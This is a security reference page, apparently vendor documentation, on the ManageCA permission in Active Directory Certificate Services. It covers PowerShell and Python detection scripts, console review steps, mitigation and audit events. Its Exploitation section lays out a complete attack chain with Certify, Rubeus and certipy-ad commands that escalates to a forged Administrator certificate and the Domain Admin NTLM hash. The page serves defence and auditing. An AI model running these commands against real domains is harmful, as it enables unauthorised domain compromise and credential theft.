# ManageCA

## Summary

|                            |                          |
| -------------------------- | ------------------------ |
| **FSProtect ACL Alias**    | ManageCA                 |
| **Affected Object Types**  | CertificationAuthorities |
| **Exploitation Certainty** | Certain                  |

## Description

The `ManageCA` permission in a Certificate Authority (CA) environment allows an account to control CA operations, including issuing, revoking and renewing certificates, managing certificate templates, and updating CA configuration settings. CA administrators rely on it to maintain the integrity of the Public Key Infrastructure (PKI) by ensuring that certificates are correctly managed and secured.

If the `ManageCA` permission is misconfigured, it can introduce significant security risks. An attacker with this permission can issue fraudulent certificates, revoke legitimate ones, or modify CA settings to bypass security controls. These actions could undermine trust in the CA, enabling the attacker to impersonate trusted entities, intercept secure communications, or gain unauthorized access to network resources.

## Identification

### PowerShell

#### Active Directory & PSPKI Modules

Using the ActiveDirectory and PSPKI PowerShell modules, you can identify ManageCA permissions on Certification Authorities in the domain.

Function: Find-ManageCA

```powershell
function Find-ManageCA {
    [CmdletBinding()]
    param (
        [string]$ComputerDN = $null,
        [string]$OutputPath = "ManageCA.csv"
    )
    # Load the ActiveDirectory and PSPKI modules if they are not already present
    foreach ($module in @("ActiveDirectory", "PSPKI")) {
        if (-not (Get-Module -Name $module)) {
            Write-Host "Attempting to load $module module..."
            try {
                Import-Module $module -ErrorAction Stop
                Write-Host "$module module loaded successfully."
            }
            catch {
                Write-Error "Failed to load $module module. Please ensure it is installed."
                return
            }
        }
    }
    # Only explicit Allow entries are of interest
    $AccessControlType = [System.Security.AccessControl.AccessControlType]::Allow
    $results = @()
    try {
        if ($ComputerDN) {
            Write-Host "Scanning specific Certification Authority: $ComputerDN"
            $ComputerName = (Get-ADComputer -Identity $ComputerDN -Properties dNSHostName |
                             Select-Object -ExpandProperty dNSHostName)
            $targetComputers = @($ComputerName)
        }
        else {
            # Every computer object in the domain is probed, which can be slow in large domains
            Write-Host "Scanning all Certification Authorities in the domain..."
            $targetComputers = Get-ADComputer -Filter * -Properties dNSHostName |
                               Select-Object -ExpandProperty dNSHostName
        }
        foreach ($ComputerName in $targetComputers) {
            try {
                # Read the CA's own security descriptor and keep the non-inherited
                # Allow entries whose rights include ManageCA
                Get-CertificationAuthority -ComputerName $ComputerName |
                Get-CertificationAuthorityAcl |
                Select-Object -ExpandProperty Access |
                Where-Object {
                    $_.AccessControlType -eq $AccessControlType -and
                    $_.Rights -like "*ManageCA*" -and
                    $_.IsInherited -eq $false
                } |
                ForEach-Object {
                    $results += [PSCustomObject]@{
                        "Vulnerable CA"   = $ComputerName
                        "Internal Threat" = $_.IdentityReference
                    }
                }
            }
            catch { Write-Warning "Error scanning CA on $ComputerName : $($_.Exception.Message)" }
        }
    }
    catch {
        Write-Error "Unexpected error during CA scan: $($_.Exception.Message)"
        return
    }
    if ($results.Count -gt 0) {
        try {
            $results | Export-Csv -Path $OutputPath -NoTypeInformation -Encoding UTF8
            Write-Host "Results exported successfully to '$OutputPath'"
        }
        catch { Write-Error "Failed to export results to CSV: $($_.Exception.Message)" }
    }
    else { Write-Host "No ManageCA permissions found." }
}
```

Usage Examples:

**1.** Scan all Certification Authorities in the domain

```powershell
Find-ManageCA
```

**2.** Scan a specific CA server by Distinguished Name

```powershell
Find-ManageCA -ComputerDN "CN=FSCA01,CN=Computers,DC=forestall,DC=labs"
```

**3.** Save results to a custom file path

```powershell
Find-ManageCA -OutputPath "C:\Temp\ManageCA_Results.csv"
```
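The same check can be applied to a CA security descriptor in SDDL form, for example when reviewing a descriptor exported from a CA outside PowerShell. The Python below is an added example, not part of this page's tooling or of FSProtect: it assumes the CA rights bit values that PSPKI, Certify and Certipy use (ManageCA = 0x1, ManageCertificates = 0x2, Read = 0x100, Enroll = 0x200), an assumed approved-holder baseline of the BA/DA/EA SDDL aliases, and a constructed sample descriptor.

```python
import re

# CA access-mask bits (the CertificationAuthorityRights values PSPKI, Certify and Certipy
# use for CA ACLs). In a CA descriptor the generic SDDL token "CC" (0x1) therefore means
# ManageCA and "DC" (0x2) means ManageCertificates.
CA_RIGHTS = {0x1: "ManageCA", 0x2: "ManageCertificates", 0x100: "Read", 0x200: "Enroll"}

# Two-letter SDDL rights tokens and their mask values (the subset CA descriptors use)
SDDL_TOKENS = {"CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
               "DT": 0x40, "LO": 0x80, "CR": 0x100, "SD": 0x10000, "RC": 0x20000,
               "WD": 0x40000, "WO": 0x80000}

# ACE layout: (type;flags;rights;object_guid;inherit_object_guid;trustee)
ACE_RE = re.compile(r"\((?P<type>[A-Z]+);[A-Z]*;(?P<rights>[^;]*);[^;]*;[^;]*;(?P<sid>[^)]+)\)")

def parse_rights(rights: str) -> int:
    """Turn an SDDL rights field (hex such as 0x300, or tokens such as CCDC) into a mask."""
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    mask = 0
    for i in range(0, len(rights), 2):
        token = rights[i:i + 2]
        if token not in SDDL_TOKENS:
            raise ValueError(f"unsupported SDDL rights token: {token!r}")
        mask |= SDDL_TOKENS[token]
    return mask

def ca_rights(mask: int) -> list[str]:
    """Name the CA-specific rights present in an access mask."""
    return [name for bit, name in CA_RIGHTS.items() if mask & bit]

def allow_aces(sddl: str) -> list[tuple[str, list[str]]]:
    """Return (trustee, CA rights) for every access-allowed ACE in the DACL."""
    dacl = re.search(r"D:([^:]*)", sddl)  # "D:" opens the DACL; a following "S:" (SACL) ends it
    if not dacl:
        return []
    return [(m.group("sid"), ca_rights(parse_rights(m.group("rights"))))
            for m in ACE_RE.finditer(dacl.group(1)) if m.group("type") == "A"]

def unexpected_manage_ca(sddl: str, allowed=frozenset({"BA", "DA", "EA"})) -> list[str]:
    """Trustees holding ManageCA outside the approved set (assumed default: built-in,
    domain and enterprise admins, written as SDDL aliases)."""
    return [sid for sid, rights in allow_aces(sddl) if "ManageCA" in rights and sid not in allowed]

# Constructed sample (not from a real CA): admins with full control, Authenticated Users
# with Read+Enroll (0x300), and a plain user SID that has been granted ManageCA (0x1).
SAMPLE_SDDL = ("O:BAG:SYD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;DA)"
               "(A;;0x300;;;AU)(A;;0x1;;;S-1-5-21-3838874360-3982899950-1830233728-1108)")
```

Run `unexpected_manage_ca()` over the descriptor of each CA and alert on anything it returns, adding the SIDs of your own PKI administration group to `allowed`.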

#### Certification Authority Console (GUI)

**1.** Open the Certification Authority management console (certsrv) on your CA server.

**2.** Right-click the CA server name and choose Properties.

**3.** Go to the Security tab.

**4.** Locate the Access Control Entry (ACE) for the user or group you want to review.

**5.** In the permissions list, check whether the ManageCA permission is set.

**6.** Click OK to save and close.

![certsrv](/files/oNKESITrQk4Ib7bBKS8H)

## Exploitation

The ManageCA permission provides an attacker with full administrative control over the Certification Authority (CA).

### Windows

#### Add our user as officer

```powershell
.\Certify.exe manage-ca --officer <sid> --ca '<ca>'
```

Example:

```powershell
.\Certify.exe manage-ca --officer S-1-5-21-3838874360-3982899950-1830233728-1108 --ca 'DC.Forestall.labs\Forestall-ROOT-CA'
```

![Add our user as officer](/files/6kvgUCrv4nhHuGzCtaLZ)

![get sid of current user](/files/BddNxml88dtJaVRoPYUS)

#### Enable the SubCA template (ESC01-vulnerable by default)

```powershell
.\Certify.exe manage-ca --ca '<ca>' --template subca
```

Example:

```powershell
.\Certify.exe manage-ca --ca 'DC.Forestall.labs\Forestall-ROOT-CA' --template subca
```

![Enable by default ESC01 vulnerable SubCA template](/files/WPCHRQdTV5mVDyPF8exZ)

#### Request a certificate from SubCA

```powershell
.\Certify.exe request --ca '<ca>' --template subca --upn "Administrator@<domain>"
```

Example:

```powershell
.\Certify.exe request --ca 'DC.Forestall.labs\Forestall-ROOT-CA' --template subca --upn "Administrator@<domain>"
```

![Request a certificate from SubCA](/files/wGSYKawe6nZ9GqgRCOml)

#### Issue the failed request

```powershell
.\Certify.exe manage-ca --issue-id '<requestid>' --ca '<ca>'
```

Example:

```powershell
.\Certify.exe manage-ca --issue-id 103 --ca 'DC.Forestall.labs\Forestall-ROOT-CA'
```

![Issue the failed request](/files/eUa8cfnimXm5Glk3qZCK)

#### Retrieve the issued certificate

```powershell
.\Certify.exe request-download --ca '<ca>' --id '<requestid>' --private-key '<base64privatekey>'
```

Example:

```powershell
.\Certify.exe request-download --ca 'DC.Forestall.labs\Forestall-ROOT-CA' --id 103 --private-key 'LS0t[snip..]0tDQo='
```

![Retrieve the issued certificate](/files/KhGSOPuO6rGjbBuy6fPp)

#### Retrieve Domain Admin NTLM hash

```powershell
.\Rubeus.exe asktgt /user:administrator /getcredentials /enctype:aes256 /certificate:<pfxbase64>
```

Example:

```powershell
.\Rubeus.exe asktgt /user:administrator /getcredentials /enctype:aes256 /certificate:MIACA[snip..]AAAA
```

![Retrieve Domain Admin NTLM hash](/files/JD8hjgMsHAGSSvXVwiTJ) ![Retrieve Domain Admin NTLM hash](/files/afKxABUFw92zo081XRO2)

### Linux

#### Add our user as officer

```bash
certipy-ad ca -u <user>@<domain> -p '<pass>' -ca '<ca>' -target <dcip> -add-officer <user>
```

Example:

```bash
certipy-ad ca -u adam@forestall.labs -p 'Temp123!' -ca 'Forestall-ROOT-CA' -target 192.168.100.128 -add-officer 'adam'
```

![Add our user as officer](/files/cEV9JiaxwbJ2GKTOvmhi)

#### Enable the SubCA template (ESC01-vulnerable by default)

```bash
certipy-ad ca -u <user>@<domain> -p '<pass>' -ca '<ca>' -target <dcip> -enable-template 'SubCA'
```

Example:

```bash
certipy-ad ca -u adam@forestall.labs -p 'Temp123!' -ca 'Forestall-ROOT-CA' -target 192.168.100.128 -enable-template 'SubCA'
```

![Enable by default ESC01 vulnerable SubCA template](/files/dW5iK0LnevbJanTBzZrJ)

#### Request a certificate from SubCA

```bash
certipy-ad req -u <user>@<domain> -p '<pass>' -ca '<ca>' -template subca -target <dcip> -upn administrator@<domain>
```

Example:

```bash
certipy-ad req -u adam@forestall.labs -p 'Temp123!' -ca 'Forestall-ROOT-CA' -template subca -target 192.168.100.128 -upn administrator@forestall.labs
```

![Request a certificate from SubCA](/files/ijYeXQ1nJqvuNGsQb5DZ)

#### Issue the failed request

```bash
certipy-ad ca -u <user>@<domain> -p '<pass>' -ca '<ca>' -target <dcip> -issue-request <requestid>
```

Example:

```bash
certipy-ad ca -u adam@forestall.labs -p 'Temp123!' -ca 'Forestall-ROOT-CA' -target 192.168.100.128 -issue-request 99
```

![Issue the failed request](/files/6JgHvd2z1pHz4fEGLAV6)

#### Retrieve the issued certificate

```bash
certipy-ad req -u <user>@<domain> -p '<pass>' -ca '<ca>' -template subca -target <dcip> -upn administrator@<domain> -retrieve <requestid>
```

Example:

```bash
certipy-ad req -u adam@forestall.labs -p 'Temp123!' -ca 'Forestall-ROOT-CA' -template subca -target 192.168.100.128 -upn administrator@forestall.labs -retrieve 99
```

![Retrieve the issued certificate](/files/3WgqAw0mZmLZKRAuzJCa)

#### Retrieve Domain Admin NTLM hash

```bash
certipy-ad auth -pfx administrator.pfx -username administrator -domain <domain> -dc-ip <dcip>
```

Example:

```bash
certipy-ad auth -pfx administrator.pfx -username administrator -domain forestall.labs -dc-ip 192.168.100.128
```

![Retrieve Domain Admin NTLM hash](/files/MSVcR2cFB8CpDUHyrH1g)

## Mitigation

To reduce the risk associated with ManageCA, restrict it to the CA administrators who actually need it by following the steps below:

**1.** Open the Certification Authority management console (certsrv) on the CA server.

**2.** Right-click the CA server name and choose Properties.

**3.** In the Properties window, go to the Security tab.

**4.** In the Security settings, locate and select the Access Control Entry (ACE) for the user or group you want to configure.

**5.** In the permissions list, remove the ManageCA permission if it is not required.

**6.** Click OK to save the changes.

![certsrv](/files/oNKESITrQk4Ib7bBKS8H)

## Detection

Adding new Access Control Entries (ACEs) to Active Directory objects changes the object's `ntSecurityDescriptor` attribute, and those changes can be detected by monitoring event IDs 5136 and 4662. The CA's own permission set, which is where ManageCA is granted, is stored on the CA server rather than in Active Directory; a change to it is reported by event 4882 on the CA, which is only written when Certification Services auditing is enabled (the Auditing tab of the CA properties together with the Audit Certification Services subcategory). Follow-on actions available to a ManageCA holder, such as changing the certificate manager (officer) assignments or a CA configuration entry, are logged as events 4890 and 4891 respectively.

| Event ID | Description                                               | Fields/Attributes      | References                                                                                                             |
| -------- | --------------------------------------------------------- | ---------------------- | ---------------------------------------------------------------------------------------------------------------------- |
| 5136     | A directory service object was modified.                  | ntSecurityDescriptor   | <https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5136>                             |
| 4662     | An operation was performed on an object.                  | AccessList, AccessMask | <https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662>                             |
| 4882     | The security permissions for Certificate Services changed | Permission             | <https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn786423(v=ws.11)> |

## References

* [AD Certificates - CyberArk Docs](https://docs.cyberark.com/identity/latest/en/content/coreservices/connector/ad-certificates.htm)
* [Configure Server Certificate Autoenrollment - Microsoft Docs](https://learn.microsoft.com/en-us/windows-server/networking/core-network-guide/cncg/server-certs/configure-server-certificate-autoenrollment)
* [The Hacker Recipes – ADCS Access Controls](https://www.thehacker.recipes/ad/movement/adcs/access-controls)

